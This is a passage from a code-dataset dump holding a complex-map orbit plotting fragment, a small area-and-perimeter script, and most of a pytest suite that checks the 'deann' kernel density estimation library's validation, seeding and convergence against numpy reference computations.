    if abs(x) > 1:
        continue
    yp =[]
    yp.append(x.imag)
    xp.append(x.real)
    print(x)
    plt.scatter(x.real,x.imag)
    # iterate the map, recording and plotting the orbit
    for i in range(initial_iterations):
        x = func(x, c)
        xp.append(x.real)
        yp.append(x.imag)
        plt.scatter(x.real,x.imag)
    plt.plot(xp,yp)
plt.show()
|
996,858 | 27995f9d9a2c76eea33d8e70204fd5e687f5e489 | arr = input().split(' ')
(a, b) = tuple((int(x) for x in arr))
area = a * b
circumference = (a + b) * 2
print(area, circumference) |
996,859 | dc047277174409e061d51dbdfff9ba635888c9db | #!/usr/bin/env python3
import numpy as np
import pytest
from sklearn.neighbors import NearestNeighbors
import deann
import sys
from extern.brute import BruteNN
from extern.faiss import FaissIVF
import time
def gaussian_kernel(q, X, h):
    """Gaussian kernel exp(-||q - x||^2 / (2 h^2)) for every row x of X."""
    sq_dists = np.square(q[None, :] - X).sum(axis=1)
    return np.exp(-sq_dists / h / h / 2)
def exponential_kernel(q, X, h):
    """Exponential kernel exp(-||q - x||_2 / h) for every row x of X."""
    dists = np.linalg.norm(q[None, :] - X, axis=1)
    return np.exp(-dists / h)
def laplacian_kernel(q, X, h):
    """Laplacian kernel exp(-||q - x||_1 / h) for every row x of X."""
    l1_dists = np.linalg.norm(q[None, :] - X, 1, axis=1)
    return np.exp(-l1_dists / h)
def naive_kde(q, X, K, h):
    """Exact KDE estimate at query q: the mean of kernel K over all rows
    of reference set X, with bandwidth h."""
    n, d = X.shape  # also validates that X is 2-D
    weights = K(q, X, h)
    return np.mean(weights)
def relative_error(wrong, correct):
    """Relative error of ``wrong`` against the reference ``correct``
    (assumed positive): |wrong - correct| / correct."""
    abs_err = np.abs(wrong - correct)
    return abs_err / correct
def construct_test_set():
    """Build a deterministic two-cluster 9-D Gaussian test set.

    Draws N1 + N2 points from two Gaussians (mean mu_k, covariance
    A_k A_k^T with A_k lower triangular), shuffles them with a fixed
    seed, and returns an even split (X, Y) of N/2 points each.
    """
    N1 = 3737
    N2 = 609
    N = N1 + N2
    assert N % 2 == 0
    n = m = N//2
    # cluster 1: mean and lower-triangular factor of its covariance
    mu1 = np.array([46.49246863044118, -0.47588088931695965, 85.96002889477487,
                    0.16082082564143724, 41.49583968750836, 0.9723626829333547,
                    39.45937341145624, 44.44947427562405, 5.157770821628274])
    A1 = np.array([[10.48441711263751, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
                   [0.3964970383667547, 21.730310765493968, 0.0, 0.0, 0.0, 0.0,
                    0.0, 0.0, 0.0],
                   [3.4485084625657643, -0.28120939185823735, 8.57050385349843,
                    0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
                   [-0.05130389161841126, -0.08261614921017782,
                    2.025124811423481, 34.80552047242849, 0.0, 0.0, 0.0, 0.0, 0.0],
                   [8.344024828411815, -0.030790194630293425,
                    -0.33708339870068904, 0.07328329343061195,
                    8.214712617983201, 0.0, 0.0, 0.0, 0.0],
                   [-0.03594926637950729, -0.7417873669876849,
                    -0.3153276829264685, 0.21607122879087798,
                    0.7254472592067689, 30.244917748649506, 0.0, 0.0, 0.0],
                   [-7.061282924462716, -0.2807508626111792, 8.531825490064175,
                    0.007605230963321018, -0.02816145276795588,
                    -0.006179511009823437, 0.5317477635530977, 0.0, 0.0],
                   [-4.844164935453136, -0.24415434388943516, 8.898715502133424,
                    -0.07811784341778047, -8.147890471517472,
                    -0.011989078614931445, 0.1842655678091983,
                    0.6704522457878629, 0.0],
                   [2.206335462583935, 0.03892495420779414, 0.3274019618648675,
                    -0.07720234409271014, -8.006262044202852,
                    0.04028908425200501, -0.22714713659168925,
                    0.4704157754390525, 0.6528722309151673]])
    # cluster 2: mean and lower-triangular factor of its covariance
    mu2 = np.array([58.96024314112042, 1.8997864300969278, 81.54476753737474,
                    0.8886150813208477, -8.273698045013964,
                    -2.2424839822572697, 22.510760637424017,
                    90.52998192870051, 67.98390011499917])
    A2 = np.array([[16.065592111452954, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
                   [4.009184067265925, 51.70302976271875, 0.0, 0.0, 0.0, 0.0,
                    0.0, 0.0, 0.0],
                   [1.8722216445930944, 0.08002264937499314, 4.650411850261695,
                    0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
                   [-2.0057332330331543, 0.11165453494383987,
                    2.3276813178792555, 67.39430848603813, 0.0, 0.0, 0.0,
                    0.0, 0.0],
                   [-6.405410328832197, 1.9441154252900719, 3.467768467646764,
                    -0.4144368424064272, 14.541572107236027, 0.0, 0.0, 0.0,
                    0.0],
                   [3.592427751645286, -1.6136283180871827,
                    -5.6823579216710245, 6.399797684468458,
                    -0.008742434962222196, 96.21821018207623, 0.0, 0.0,
                    0.0],
                   [-14.239761076411021, 0.09365916755945296,
                    4.59040104584355, 0.002839284036579001,
                    0.0027681727245653298, 0.012371444953884297,
                    0.549654997829911, 0.0, 0.0],
                   [8.44884295589548, -1.911195319541577, 1.0658234673982725,
                    0.43735285474527746, -14.922878992826801,
                    0.011714016169396069, 0.19048151609840624,
                    0.69960090582502, 0.0],
                   [22.602748434210355, -2.0069000884320456,
                    -3.508134127959344, 0.43894223781589753,
                    -14.911426203496662, 0.009953869896377816,
                    -0.17085555729674284, 0.5764982581276846,
                    0.6740065987615914]])
    d, = mu1.shape
    assert mu2.shape == (d,)
    assert A1.shape == (d,d)
    assert A2.shape == (d,d)
    rng = np.random.default_rng(271828)  # fixed seed: reproducible data
    Z = np.zeros((N,d))
    for i in range(N1):
        z = rng.standard_normal(d)
        Z[i,:] = mu1 + A1.dot(z)  # affine transform of N(0, I)
    for i in range(N1,N):
        z = rng.standard_normal(d)
        Z[i,:] = mu2 + A2.dot(z)
    # shuffle so both halves mix the two clusters
    ind = np.arange(N)
    rng.shuffle(ind)
    X_ind = ind[:n]
    Y_ind = ind[n:]
    return Z[X_ind,:], Z[Y_ind,:]
def kde_matmul_exp(query, data, h):
    """Exponential-kernel KDE for every query row, computed with a single
    matrix product: ||q - x||^2 = |q|^2 - 2 q.x + |x|^2 (clamped at 0 to
    guard against negative round-off)."""
    sq = (query**2).sum(-1)[:, None] - \
        2.0*query.dot(data.T) + \
        (data**2).sum(-1)[None, :]
    dists = np.sqrt(np.maximum(sq, 0.0))
    return np.mean(np.exp(-dists/h), axis=-1)
def kde_matmul_gauss(query, data, h):
    """Gaussian-kernel KDE for every query row, via one matrix product.
    Squared distances are clamped at 0 to guard against round-off."""
    sq = (query**2).sum(-1)[:, None] - \
        2.0*query.dot(data.T) + \
        (data**2).sum(-1)[None, :]
    return np.mean(np.exp(-np.maximum(sq, 0.0)/h/h/2), axis=-1)
def kde_matmul_loop(query, data, h):
    """Exponential-kernel KDE computed one query row at a time (memory
    friendly: never materializes the full query-by-data distance matrix)."""
    mu = np.zeros(query.shape[0], dtype=query.dtype)
    Xsq = (data**2).sum(-1)  # hoisted: |x|^2 per data row
    for idx, q in enumerate(query):
        sq = (q**2).sum(-1) - 2.0*data.dot(q.T) + Xsq
        mu[idx] = np.mean(np.exp(-np.sqrt(np.maximum(sq, 0.0))/h))
    return mu
def kde_laplacian(query, data, h):
    """Laplacian (L1) kernel KDE; distances are filled row by row."""
    dist_matrix = np.zeros((query.shape[0], data.shape[0]), query.dtype)
    for idx, q in enumerate(query):
        dist_matrix[idx, :] = np.linalg.norm(q[None, :] - data, ord=1, axis=-1)
    return np.mean(np.exp(-dist_matrix/h), axis=-1)
def find_nearest_neighbor(q, X, metric):
    """Return the index of the row of X nearest to q.

    q: 1d query point; X: (n, d) data matrix.
    metric: 'euclidean' selects the L2 norm; any other value falls back
    to L1 (taxicab), matching the original conditional.

    Replaces the previous O(n) Python loop with a single vectorized
    norm + argmin. np.argmin returns the first minimizer, which is the
    same tie-breaking as the old strict '<' scan.
    """
    norm_ord = 2 if metric == 'euclidean' else 1
    dists = np.linalg.norm(X - q[None, :], ord=norm_ord, axis=-1)
    return int(np.argmin(dists))
def test_naive_kde1():
    """NaiveKde argument validation plus exact agreement with the numpy
    reference implementations (kde_matmul_exp / kde_matmul_gauss /
    kde_laplacian) for float64 and float32 data.
    """
    # Invalid constructor args: non-positive bandwidth, unknown kernel name.
    with pytest.raises(ValueError):
        deann.NaiveKde(0.0, 'exponential')
    with pytest.raises(ValueError):
        deann.NaiveKde(-1.0, 'exponential')
    with pytest.raises(ValueError):
        deann.NaiveKde(1.0, 'eXponential')
    # Invalid fit inputs: wrong rank, wrong dtype, empty dimensions.
    with pytest.raises(ValueError):
        deann.NaiveKde(1.0,'exponential').fit(np.ones(10))
    with pytest.raises(ValueError):
        deann.NaiveKde(1.0,'exponential').fit(np.ones((10,9), dtype=np.int64))
    with pytest.raises(ValueError):
        deann.NaiveKde(1.0,'exponential').fit(np.ones((0,9), dtype=np.float64))
    with pytest.raises(ValueError):
        deann.NaiveKde(1.0,'exponential').fit(np.ones((10,0), dtype=np.float32))
    # Query before fit must fail.
    with pytest.raises(ValueError):
        nkde = deann.NaiveKde(1.0,'exponential')
        nkde.query(np.ones((2,9), dtype=np.float64))
    # Dtype mismatches between fit and query must fail (both directions).
    with pytest.raises(ValueError):
        nkde = deann.NaiveKde(1.0,'exponential')
        nkde.fit(np.ones((10,9), dtype=np.float64))
        nkde.query(np.ones((2,9), dtype=np.float32))
    with pytest.raises(ValueError):
        nkde = deann.NaiveKde(1.0,'exponential')
        nkde.fit(np.ones((10,9), dtype=np.float32))
        nkde.query(np.ones((2,9), dtype=np.float64))
    # Dimensionality mismatch between fit and query must fail.
    with pytest.raises(ValueError):
        nkde = deann.NaiveKde(1.0,'exponential')
        nkde.fit(np.ones((10,9), dtype=np.float32))
        nkde.query(np.ones((2,8), dtype=np.float32))
    # --- float64: exact comparison against numpy references ---
    X, Y = construct_test_set()
    assert X.dtype == np.float64
    assert Y.dtype == np.float64
    assert X.ndim == 2
    assert Y.ndim == 2
    assert X.shape[1] == Y.shape[1]
    abs_epsilon = 1e-15
    rel_epsilon = 1e-13
    # Exponential kernel.
    h = 16.0
    mu = kde_matmul_exp(Y, X, h)
    nkde = deann.NaiveKde(h, 'exponential')
    nkde.fit(X)
    Z, S = nkde.query(Y)
    assert mu.dtype == np.float64
    assert mu.ndim == 1
    assert mu.shape[0] == Y.shape[0]
    assert mu.dtype == Z.dtype
    assert mu.ndim == Z.ndim
    assert mu.shape[0] == Z.shape[0]
    assert np.all(np.abs(Z-mu) < abs_epsilon)
    assert np.all(np.abs((Z-mu)/mu) < rel_epsilon)
    # Naive KDE always evaluates all data points.
    assert S.dtype == np.int32
    assert S.ndim == 1
    assert S.shape[0] == mu.shape[0]
    assert np.all(S == X.shape[0])
    # Gaussian kernel.
    h = 19.0
    mu = kde_matmul_gauss(Y, X, h)
    nkde = deann.NaiveKde(h, 'gaussian')
    nkde.fit(X)
    Z, S = nkde.query(Y)
    assert mu.dtype == np.float64
    assert mu.ndim == 1
    assert mu.shape[0] == Y.shape[0]
    assert mu.dtype == Z.dtype
    assert mu.ndim == Z.ndim
    assert mu.shape[0] == Z.shape[0]
    assert np.all(np.abs(Z-mu) < abs_epsilon)
    assert np.all(np.abs((Z-mu)/mu) < rel_epsilon)
    assert S.dtype == np.int32
    assert S.ndim == 1
    assert S.shape[0] == mu.shape[0]
    assert np.all(S == X.shape[0])
    # Laplacian kernel.
    h = 33.0
    mu = kde_laplacian(Y, X, h)
    nkde = deann.NaiveKde(h, 'laplacian')
    nkde.fit(X)
    Z, S = nkde.query(Y)
    assert mu.dtype == np.float64
    assert mu.ndim == 1
    assert mu.shape[0] == Y.shape[0]
    assert mu.dtype == Z.dtype
    assert mu.ndim == Z.ndim
    assert mu.shape[0] == Z.shape[0]
    assert np.all(np.abs(Z-mu) < abs_epsilon)
    assert np.all(np.abs((Z-mu)/mu) < rel_epsilon)
    # --- float32: same checks with looser tolerances ---
    X, Y = construct_test_set()
    X = X.astype(np.float32)
    Y = Y.astype(np.float32)
    assert X.dtype == np.float32
    assert Y.dtype == np.float32
    assert X.ndim == 2
    assert Y.ndim == 2
    assert X.shape[1] == Y.shape[1]
    abs_epsilon = 1e-06
    rel_epsilon = 1e-04
    # Exponential kernel.
    h = 17.0
    mu = kde_matmul_exp(Y, X, h)
    nkde = deann.NaiveKde(h, 'exponential')
    nkde.fit(X)
    Z, S = nkde.query(Y)
    assert mu.dtype == np.float32
    assert mu.ndim == 1
    assert mu.shape[0] == Y.shape[0]
    assert mu.dtype == Z.dtype
    assert mu.ndim == Z.ndim
    assert mu.shape[0] == Z.shape[0]
    assert np.all(np.abs(Z-mu) < abs_epsilon)
    assert np.all(np.abs((Z-mu)/mu) < rel_epsilon)
    assert S.dtype == np.int32
    assert S.ndim == 1
    assert S.shape[0] == mu.shape[0]
    assert np.all(S == X.shape[0])
    # Gaussian kernel.
    h = 20.0
    mu = kde_matmul_gauss(Y, X, h)
    nkde = deann.NaiveKde(h, 'gaussian')
    nkde.fit(X)
    Z, S = nkde.query(Y)
    assert mu.dtype == np.float32
    assert mu.ndim == 1
    assert mu.shape[0] == Y.shape[0]
    assert mu.dtype == Z.dtype
    assert mu.ndim == Z.ndim
    assert mu.shape[0] == Z.shape[0]
    # Diagnostic output for any entry breaking tolerance, printed before
    # the hard asserts below so failures are easier to debug.
    for i in range(mu.shape[0]):
        if np.abs((Z[i]-mu[i])/mu[i]) > rel_epsilon or np.abs(Z[i]-mu[i]) > abs_epsilon:
            print(mu[i], Z[i], np.abs(Z[i]-mu[i]), np.abs((Z[i]-mu[i])/mu[i]))
    assert np.all(np.abs(Z-mu) < abs_epsilon)
    assert np.all(np.abs((Z-mu)/mu) < rel_epsilon)
    assert S.dtype == np.int32
    assert S.ndim == 1
    assert S.shape[0] == mu.shape[0]
    assert np.all(S == X.shape[0])
    # Laplacian kernel.
    h = 34.0
    mu = kde_laplacian(Y, X, h)
    nkde = deann.NaiveKde(h, 'laplacian')
    nkde.fit(X)
    Z, S = nkde.query(Y)
    assert mu.dtype == np.float32
    assert mu.ndim == 1
    assert mu.shape[0] == Y.shape[0]
    assert mu.dtype == Z.dtype
    assert mu.ndim == Z.ndim
    assert mu.shape[0] == Z.shape[0]
    assert np.all(np.abs(Z-mu) < abs_epsilon)
    assert np.all(np.abs((Z-mu)/mu) < rel_epsilon)
    assert S.dtype == np.int32
    assert S.ndim == 1
    assert S.shape[0] == mu.shape[0]
    assert np.all(S == X.shape[0])
def test_naive_kde2():
    """NaiveKde is deterministic: reseeding (with or without an explicit
    seed) must leave both the estimates and the sample counts unchanged.
    """
    bandwidth = 35.0
    for dtype in [np.float32, np.float64]:
        data, queries = construct_test_set()
        data = data.astype(dtype)
        queries = queries.astype(dtype)
        for kern in ['exponential', 'gaussian', 'laplacian']:
            est = deann.NaiveKde(bandwidth, kern)
            est.fit(data)
            baseline, samples0 = est.query(queries)
            # Reseed without an argument, then with an explicit seed;
            # neither may affect a deterministic estimator.
            est.reset_seed()
            after_default, samples1 = est.query(queries)
            est.reset_seed(0)
            after_zero, samples2 = est.query(queries)
            for other in (after_default, after_zero):
                assert np.array_equal(baseline, other)
            assert np.array_equal(samples0, samples1)
            assert np.array_equal(samples1, samples2)
            # Naive KDE always evaluates every data point.
            assert np.all(samples0 == data.shape[0])
def test_random_sampling1():
    """RandomSampling argument validation plus convergence: increasing the
    number of samples m must monotonically shrink the average error
    against the exact NaiveKde values.

    Bug fix: the sample-count comparison previously read
    np.array_equal(S1,S1) — a tautology; it now compares S1 against S2
    as the surrounding shape checks clearly intend.
    """
    # --- constructor / fit / query argument validation ---
    with pytest.raises(ValueError):
        deann.RandomSampling(0.0, 'exponential', 1)
    with pytest.raises(ValueError):
        deann.RandomSampling(-1.0, 'exponential', 1)
    with pytest.raises(ValueError):
        deann.RandomSampling(1.0, 'eXponential', 1)
    with pytest.raises(ValueError):
        deann.RandomSampling(1.0, 'exponential', 0)
    with pytest.raises(ValueError):
        deann.RandomSampling(1.0, 'exponential', -1)
    with pytest.raises(ValueError):
        deann.RandomSampling(1.0,'exponential',1).fit(np.ones(10))
    with pytest.raises(ValueError):
        deann.RandomSampling(1.0,'exponential',1).fit(np.ones((10,9), dtype=np.int64))
    with pytest.raises(ValueError):
        deann.RandomSampling(1.0,'exponential',1).fit(np.ones((0,9), dtype=np.float64))
    with pytest.raises(ValueError):
        deann.RandomSampling(1.0,'exponential',1).fit(np.ones((10,0), dtype=np.float32))
    # Query before fit, dtype/shape mismatches, and empty queries must fail.
    with pytest.raises(ValueError):
        rs = deann.RandomSampling(1.0,'exponential',1)
        rs.query(np.ones((2,9), dtype=np.float64))
    with pytest.raises(ValueError):
        rs = deann.RandomSampling(1.0,'exponential',1)
        rs.fit(np.ones((10,9), dtype=np.float64))
        rs.query(np.ones((2,9), dtype=np.int64))
    with pytest.raises(ValueError):
        rs = deann.RandomSampling(1.0,'exponential',1)
        rs.fit(np.ones((10,9), dtype=np.float64))
        rs.query(np.ones((2,9), dtype=np.float32))
    with pytest.raises(ValueError):
        rs = deann.RandomSampling(1.0,'exponential',1)
        rs.fit(np.ones((10,9), dtype=np.float32))
        rs.query(np.ones((2,9), dtype=np.float64))
    with pytest.raises(ValueError):
        rs = deann.RandomSampling(1.0,'exponential',1)
        rs.fit(np.ones((10,9), dtype=np.float32))
        rs.query(np.ones((0,9), dtype=np.float32))
    with pytest.raises(ValueError):
        rs = deann.RandomSampling(1.0,'exponential',1)
        rs.fit(np.ones((10,9), dtype=np.float32))
        rs.query(np.ones((2,0), dtype=np.float32))
    with pytest.raises(ValueError):
        rs = deann.RandomSampling(1.0,'exponential',1)
        rs.fit(np.ones((10,9), dtype=np.float32))
        rs.query(np.ones((2,8), dtype=np.float32))
    # --- convergence over increasing sample counts ---
    ms = [1, 5, 11, 200, 600, 1400]
    seed = 31415
    for dt in [np.float64, np.float32]:
        X, Y = construct_test_set()
        X = X.astype(dt)
        Y = Y.astype(dt)
        h = 25.0
        for kernel in ['exponential', 'gaussian', 'laplacian']:
            avg_abs_error = np.zeros(len(ms))
            avg_rel_error = np.zeros(len(ms))
            # Exact KDE values to compare against.
            nkde = deann.NaiveKde(h, kernel)
            nkde.fit(X)
            (mu, S0) = nkde.query(Y)
            i = 0
            for m in ms:
                seed += 1
                # Two unseeded estimators: estimates should differ (for
                # large enough m), sample counts must match.
                rs1 = deann.RandomSampling(h,kernel,m)
                rs1.fit(X)
                (Z1, S1) = rs1.query(Y)
                rs2 = deann.RandomSampling(h,kernel,m)
                rs2.fit(X)
                (Z2, S2) = rs2.query(Y)
                assert Z1.ndim == 1
                assert Z2.ndim == 1
                assert Z1.shape[0] == Y.shape[0]
                assert Z2.shape[0] == Y.shape[0]
                assert S0.ndim == 1
                assert S1.ndim == 1
                assert S2.ndim == 1
                assert S0.shape == S1.shape
                assert S0.shape == S2.shape
                # BUG FIX: was np.array_equal(S1,S1), trivially true.
                assert np.array_equal(S1,S2)
                assert np.all(S0 == X.shape[0])
                assert np.all(S1 == m)
                if m > 11:
                    assert np.all(Z1 != Z2)
                # Different explicit seeds must give different estimates.
                rs1 = deann.RandomSampling(h, kernel, m, seed + 1)
                rs1.fit(X)
                (Z1, S1) = rs1.query(Y)
                rs2 = deann.RandomSampling(h, kernel, m, seed + 2)
                rs2.fit(X)
                (Z2, S2) = rs2.query(Y)
                if m > 1:
                    assert np.all(Z1 != Z2)
                assert S1.ndim == 1
                assert S2.ndim == 1
                assert S1.shape[0] == mu.shape[0]
                assert S2.shape[0] == mu.shape[0]
                assert np.all(S1 == m)
                assert np.all(S2 == m)
                # Equal seeds must reproduce the estimates exactly.
                rs1 = deann.RandomSampling(h, kernel, m, seed)
                rs1.fit(X)
                Z1, S1 = rs1.query(Y)
                rs2 = deann.RandomSampling(h, kernel, m, seed)
                rs2.fit(X)
                Z2, S2 = rs2.query(Y)
                assert np.all(Z1 == Z2)
                assert S1.ndim == 1
                assert S2.ndim == 1
                assert S1.shape[0] == mu.shape[0]
                assert S2.shape[0] == mu.shape[0]
                assert np.all(S1 == m)
                assert np.all(S2 == m)
                Z = Z1
                assert Z.ndim == 1
                assert Z.shape[0] == Y.shape[0]
                assert Z.dtype == dt
                avg_abs_error[i] = np.mean(np.abs(Z-mu))
                avg_rel_error[i] = np.mean(np.abs((Z-mu)/mu))
                i += 1
            # Errors must decrease monotonically with more samples.
            for i in range(1,len(ms)):
                assert avg_abs_error[i] < avg_abs_error[i-1]
                assert avg_rel_error[i] < avg_rel_error[i-1]
            assert avg_abs_error[-1] < 0.01
            if kernel == 'exponential':
                assert avg_rel_error[-1] < 0.1
            else:
                assert avg_rel_error[-1] < 0.2
def test_random_sampling2():
    """RandomSampling seeding semantics: equal seeds reproduce identical
    estimates, repeated queries advance the RNG, and reset_seed /
    reset_parameters restore a previously observed stream.
    """
    h = 36.0
    seed = 527372036
    for dt in [np.float32, np.float64]:
        X, Y = construct_test_set()
        X = X.astype(dt)
        Y = Y.astype(dt)
        for kernel in ['exponential', 'gaussian', 'laplacian']:
            for m in [1, 11, 111, 1111]:
                seed += 1
                rs1 = deann.RandomSampling(h,kernel,m,seed)
                rs1.fit(X)
                (mu, S0) = rs1.query(Y)
                assert np.all(S0 == m)
                # A second query advances the RNG state, so the
                # estimates must change.
                (Z1, S1) = rs1.query(Y)
                assert not np.array_equal(mu,Z1)
                assert np.all(S1 == m)
                # Reseeding with the original seed reproduces the
                # first estimates exactly.
                rs1.reset_seed(seed)
                (Z2, S2) = rs1.query(Y)
                assert np.array_equal(mu,Z2)
                assert np.all(S2 == m)
                # A fresh object with the same seed agrees as well.
                rs2 = deann.RandomSampling(h,kernel,m,seed)
                rs2.fit(X)
                (Z3, S3) = rs2.query(Y)
                assert np.array_equal(mu,Z3)
                assert np.all(S3 == m)
                rs2.reset_seed(seed)
                (Z4, S4) = rs2.query(Y)
                assert np.array_equal(mu,Z4)
                assert np.all(S4 == m)
            # reset_parameters + reset_seed must reproduce results
            # obtained from objects constructed with those (m, seed) pairs.
            params = [(3,101010), (13, 121212), (131, 23232323)]
            mus = list()
            for (m, seed2) in params:
                rs = deann.RandomSampling(h,kernel,m,seed2)
                rs.fit(X)
                mus.append(rs.query(Y))
            rs = deann.RandomSampling(h,kernel,1)
            rs.fit(X)
            Z = rs.query(Y)
            for i in range(len(mus)):
                assert not np.array_equal(mus[i],Z)
            for i in range(len(mus)):
                (m, seed2) = params[i]
                rs.reset_parameters(m)
                rs.reset_seed(seed2)
                Z = rs.query(Y)
                assert np.array_equal(mus[i],Z)
def test_random_sampling_permuted():
    """RandomSamplingPermuted: argument validation (note: the laplacian
    kernel is rejected for this estimator) and convergence to the exact
    KDE as m approaches the dataset size.
    """
    # --- constructor / fit / query argument validation ---
    with pytest.raises(ValueError):
        deann.RandomSamplingPermuted(0.0, 'exponential', 1)
    with pytest.raises(ValueError):
        deann.RandomSamplingPermuted(-1.0, 'exponential', 1)
    with pytest.raises(ValueError):
        deann.RandomSamplingPermuted(1.0, 'eXponential', 1)
    # Unlike RandomSampling, the laplacian kernel is not supported here.
    with pytest.raises(ValueError):
        deann.RandomSamplingPermuted(1.0, 'laplacian', 1)
    with pytest.raises(ValueError):
        deann.RandomSamplingPermuted(1.0, 'exponential', 0)
    with pytest.raises(ValueError):
        deann.RandomSamplingPermuted(1.0, 'exponential', -1)
    with pytest.raises(ValueError):
        deann.RandomSamplingPermuted(1.0,'exponential',1).fit(np.ones(10))
    with pytest.raises(ValueError):
        deann.RandomSamplingPermuted(1.0,'exponential',1).fit(np.ones((10,9), dtype=np.int64))
    with pytest.raises(ValueError):
        deann.RandomSamplingPermuted(1.0,'exponential',1).fit(np.ones((0,9), dtype=np.float64))
    with pytest.raises(ValueError):
        deann.RandomSamplingPermuted(1.0,'exponential',1).fit(np.ones((10,0), dtype=np.float32))
    with pytest.raises(ValueError):
        rs = deann.RandomSamplingPermuted(1.0,'exponential',1)
        rs.query(np.ones((2,9), dtype=np.float64))
    with pytest.raises(ValueError):
        rs = deann.RandomSamplingPermuted(1.0,'exponential',1)
        rs.fit(np.ones((10,9), dtype=np.float64))
        rs.query(np.ones((2,9), dtype=np.int64))
    with pytest.raises(ValueError):
        rs = deann.RandomSamplingPermuted(1.0,'exponential',1)
        rs.fit(np.ones((10,9), dtype=np.float64))
        rs.query(np.ones((2,9), dtype=np.float32))
    with pytest.raises(ValueError):
        rs = deann.RandomSamplingPermuted(1.0,'exponential',1)
        rs.fit(np.ones((10,9), dtype=np.float32))
        rs.query(np.ones((2,9), dtype=np.float64))
    with pytest.raises(ValueError):
        rs = deann.RandomSamplingPermuted(1.0,'exponential',1)
        rs.fit(np.ones((10,9), dtype=np.float32))
        rs.query(np.ones((0,9), dtype=np.float32))
    with pytest.raises(ValueError):
        rs = deann.RandomSamplingPermuted(1.0,'exponential',1)
        rs.fit(np.ones((10,9), dtype=np.float32))
        rs.query(np.ones((2,0), dtype=np.float32))
    with pytest.raises(ValueError):
        rs = deann.RandomSamplingPermuted(1.0,'exponential',1)
        rs.fit(np.ones((10,9), dtype=np.float32))
        rs.query(np.ones((2,8), dtype=np.float32))
    # m may not exceed the number of data points, neither at construction
    # nor via reset_parameters.
    with pytest.raises(ValueError):
        rs = deann.RandomSamplingPermuted(1.0,'exponential',100)
        rs.fit(np.ones((10,9), dtype=np.float32))
    with pytest.raises(ValueError):
        rs = deann.RandomSamplingPermuted(1.0,'exponential',1)
        rs.fit(np.ones((10,9), dtype=np.float32))
        rs.reset_parameters(100)
    # --- convergence over increasing sample counts ---
    seed = 31415
    for dt in [np.float64, np.float32]:
        X, Y = construct_test_set()
        X = X.astype(dt)
        Y = Y.astype(dt)
        h = 25.0
        ms = [1, 103, 506, X.shape[0]]
        for kernel in ['exponential', 'gaussian']:
            avg_abs_error = np.zeros(len(ms))
            avg_rel_error = np.zeros(len(ms))
            # Exact KDE values to compare against.
            nkde = deann.NaiveKde(h, kernel)
            nkde.fit(X)
            (mu, S0) = nkde.query(Y)
            assert np.all(S0 == X.shape[0])
            i = 0
            for m in ms:
                seed += 1
                # Unseeded estimators should disagree everywhere for
                # 1 < m < n; for the degenerate m values at least
                # somewhere (summation-order effects).
                rsp1 = deann.RandomSamplingPermuted(h,kernel,m)
                rsp1.fit(X)
                (Z1, S1) = rsp1.query(Y)
                rsp2 = deann.RandomSamplingPermuted(h,kernel,m)
                rsp2.fit(X)
                (Z2, S2) = rsp2.query(Y)
                assert Z1.ndim == 1
                assert Z2.ndim == 1
                assert Z1.dtype == dt
                assert Z2.dtype == dt
                assert Z1.shape[0] == Y.shape[0]
                assert Z2.shape[0] == Y.shape[0]
                assert S1.ndim == 1
                assert S2.ndim == 1
                assert S1.dtype == np.int32
                assert S2.dtype == np.int32
                assert S1.shape[0] == Y.shape[0]
                assert S2.shape[0] == Y.shape[0]
                assert np.all(S1 == m)
                assert np.all(S2 == m)
                if 1 < m < X.shape[0]:
                    assert np.all(Z1 != Z2)
                else:
                    assert np.any(Z1 != Z2)
                # Different explicit seeds behave like the unseeded case.
                rsp1 = deann.RandomSamplingPermuted(h, kernel, m, seed + 1)
                rsp1.fit(X)
                (Z1, S1) = rsp1.query(Y)
                rsp2 = deann.RandomSamplingPermuted(h, kernel, m, seed + 2)
                rsp2.fit(X)
                (Z2, S2) = rsp2.query(Y)
                if 1 < m < X.shape[0]:
                    assert np.all(Z1 != Z2)
                else:
                    assert np.any(Z1 != Z2)
                assert np.all(S1 == m)
                assert np.all(S2 == m)
                # Equal seeds should reproduce the estimates.
                rsp1 = deann.RandomSamplingPermuted(h, kernel, m, seed)
                rsp1.fit(X)
                (Z1, S1) = rsp1.query(Y)
                rsp2 = deann.RandomSamplingPermuted(h, kernel, m, seed)
                rsp2.fit(X)
                (Z2, S2) = rsp2.query(Y)
                # these should be equal but MKL doesn't seem to
                # guarantee that...
                assert np.all(Z1 == Z2) or \
                    dt == np.float32 and np.amax(np.abs(Z1-Z2)) < 1e-6
                assert np.all(S1 == m)
                assert np.all(S2 == m)
                # reset_seed must behave like constructing with that seed.
                rsp1 = deann.RandomSamplingPermuted(h, kernel, m, seed)
                rsp1.fit(X)
                (Z1, S1) = rsp1.query(Y)
                rsp2 = deann.RandomSamplingPermuted(h, kernel, m, seed + 1)
                rsp2.fit(X)
                rsp2.reset_seed(seed)
                (Z2, S2) = rsp2.query(Y)
                # these should be equal but MKL doesn't seem to
                # guarantee that...
                assert np.all(Z1 == Z2) or \
                    dt == np.float32 and np.amax(np.abs(Z1-Z2)) < 1e-6
                assert np.all(S1 == m)
                assert np.all(S2 == m)
                Z = Z1
                assert Z.ndim == 1
                assert Z.shape[0] == Y.shape[0]
                assert Z.dtype == dt
                avg_abs_error[i] = np.mean(np.abs(Z-mu))
                avg_rel_error[i] = np.mean(np.abs((Z-mu)/mu))
                i += 1
            # Errors must shrink with m; at m == n the estimate is
            # essentially exact (up to float summation order).
            for i in range(1,len(ms)):
                assert avg_abs_error[i] < avg_abs_error[i-1]
                assert avg_rel_error[i] < avg_rel_error[i-1]
            if dt == np.float64:
                assert avg_abs_error[-1] < 1e-16
            if dt == np.float32:
                assert avg_abs_error[-1] < 1e-7
def test_brute_nn():
    """Sanity checks for the BruteNN helper used by other tests: result
    tuple layout for all four (return-distances, return-samples) flag
    combinations, strictly sorted distances, and agreement with direct
    norm computations.
    """
    rng = np.random.default_rng(1234)
    k = 50
    for dt in [np.float64, np.float32]:
        X, Y = construct_test_set()
        X = X.astype(dt)
        Y = Y.astype(dt)
        n = X.shape[0]
        m = Y.shape[0]
        # Tolerance for distance comparisons, per dtype.
        DELTA = 1e-12 if dt == np.float64 else 1e-05
        for metric in ['euclidean', 'taxicab']:
            # Default flags: query returns (distances, neighbors, samples).
            bnn = BruteNN(metric)
            bnn.fit(X)
            idx = rng.integers(0,n)
